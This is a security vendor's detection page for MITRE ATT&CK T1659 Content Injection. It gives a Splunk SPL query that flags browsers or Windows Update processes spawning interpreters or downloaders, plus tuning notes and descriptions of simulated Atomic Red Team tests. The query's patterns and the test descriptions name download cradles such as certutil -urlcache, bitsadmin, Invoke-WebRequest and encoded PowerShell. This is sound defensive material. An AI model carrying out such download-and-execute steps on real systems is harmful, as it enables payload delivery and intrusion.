T1659 Splunk · SPL

Detect Content Injection in Splunk

This detection identifies adversary content injection attacks where malicious payloads are delivered by manipulating in-transit network traffic between victims and legitimate online services. Rather than hosting payloads on attacker-controlled websites, adversaries operating at a compromised network position—such as a compromised ISP or routing infrastructure—intercept and modify DNS, HTTP, or SMB responses before they reach the victim. The detection focuses on three behavioral indicators: suspicious interpreter or downloader processes spawned by web browsers or Windows Update components following unencrypted HTTP connections to known update domains; HTTP connections to Microsoft update infrastructure over plaintext port 80 (which should exclusively use HTTPS/443); and DNS resolutions of trusted domains returning IP addresses outside expected authoritative ranges. Known threat activity consistent with this technique includes MoustachedBouncer injecting fake Windows Update pages to deploy malware against diplomatic targets in Belarus, and the Disco implant achieving initial access through injected DNS, HTTP, and SMB replies that redirected victims to attacker-controlled download servers.

MITRE ATT&CK

Tactic
Initial Access Command and Control
Technique
T1659 Content Injection
Canonical reference
https://attack.mitre.org/techniques/T1659/

SPL Detection Query

Splunk (SPL)
spl 
index=* sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
| eval process=lower(Image)
| eval parent=lower(ParentImage)
| eval cmdline=lower(CommandLine)
| eval workdir=lower(CurrentDirectory)
| where match(parent, "svchost\.exe|wuauclt\.exe|usoclient\.exe|chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe")
| where match(process, "wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|certutil\.exe|bitsadmin\.exe|msiexec\.exe|powershell\.exe|cmd\.exe")
| where match(cmdline, "http://|ftp://|invoke-webrequest|wget |curl |bitsadmin|/transfer")
    OR match(cmdline, "-enc |-encodedcommand ")
    OR like(workdir, "%temp%") OR like(workdir, "%downloads%")
| eval risk_score=case(
    match(parent, "svchost\.exe|wuauclt\.exe|usoclient\.exe") AND match(cmdline, "http://"), 95,
    match(cmdline, "-enc |-encodedcommand "), 90,
    match(parent, "chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe") AND match(process, "powershell\.exe|cmd\.exe"), 85,
    like(workdir, "%temp%") OR like(workdir, "%downloads%"), 75,
    true(), 65
)
| table _time, host, User, process, parent, cmdline, workdir, Hashes, risk_score
| sort -risk_score, -_time
high severity medium confidence

Detects Sysmon Event ID 1 (Process Create) where a browser or Windows Update process spawns a scripting interpreter or downloader binary with command-line indicators of HTTP-based payload retrieval, encoded commands, or execution from temp/downloads directories. Risk scoring prioritizes update-service parents with HTTP download patterns (score 95) as these most closely match MoustachedBouncer's TTP, followed by encoded PowerShell (90) and browser-spawned interpreters (85).

Data Sources

Sysmon

Required Sourcetypes

XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

False Positives & Tuning

  • Enterprise software deployment systems (SCCM, Intune) that trigger PowerShell scripts through svchost.exe as part of legitimate patch management workflows
  • Browser extensions or enterprise browser management tools that spawn cmd.exe or PowerShell for configuration or telemetry purposes
  • Legitimate update agents that use HTTP endpoints on internal corporate networks or proxy servers for patching, generating the HTTP download pattern without malicious intent
  • Security tools and EDR agents that spawn child processes with Base64-encoded arguments for monitoring or collection purposes, matching the -enc command-line filter
Download portable Sigma rule (.yml)

Other platforms for T1659

Microsoft Sentinel (KQL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Simulate DNS Injection via Hosts File Redirect of Update Domain

    Expected signal: Sysmon Event ID 22 (DNS Query) showing download.microsoft.com with QueryResults containing 198.51.100.1; Sysmon Event ID 1 for nslookup.exe process creation with command line including 'download.microsoft.com'

  2. Test 2Simulated Injected Payload Execution from Browser-Spawned Process

    Expected signal: Sysmon Event ID 1 for cmd.exe spawning powershell.exe with Invoke-WebRequest and http:// URI in CommandLine; Sysmon Event ID 3 showing powershell.exe attempting TCP connection to 198.51.100.1:80; working directory will be user profile or temp path

  3. Test 3LOLBin Certutil Download Cradle from Temp Path

    Expected signal: Sysmon Event ID 1 for certutil_test.exe (copied certutil) executing from %TEMP% path with -urlcache and http:// URL in CommandLine; Sysmon Event ID 3 for HTTP connection attempt from temp path binary to 198.51.100.1:80; Sysmon Event ID 11 for file copy creating certutil_test.exe in temp

Last updated: 2026-03-20 Research depth: deep
References (7)

Unlock Pro Content

Get the full detection package for T1659 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Related Techniques

T1557Adversary-in-the-MiddleT1189Drive-by CompromiseT1105Ingress Tool TransferT1568.002Domain Generation AlgorithmsT1195.001Compromise Software Dependencies and Development ToolsT1071.004DNST1573.001Symmetric Cryptography

Same Tactic: Initial Access

Popular Detections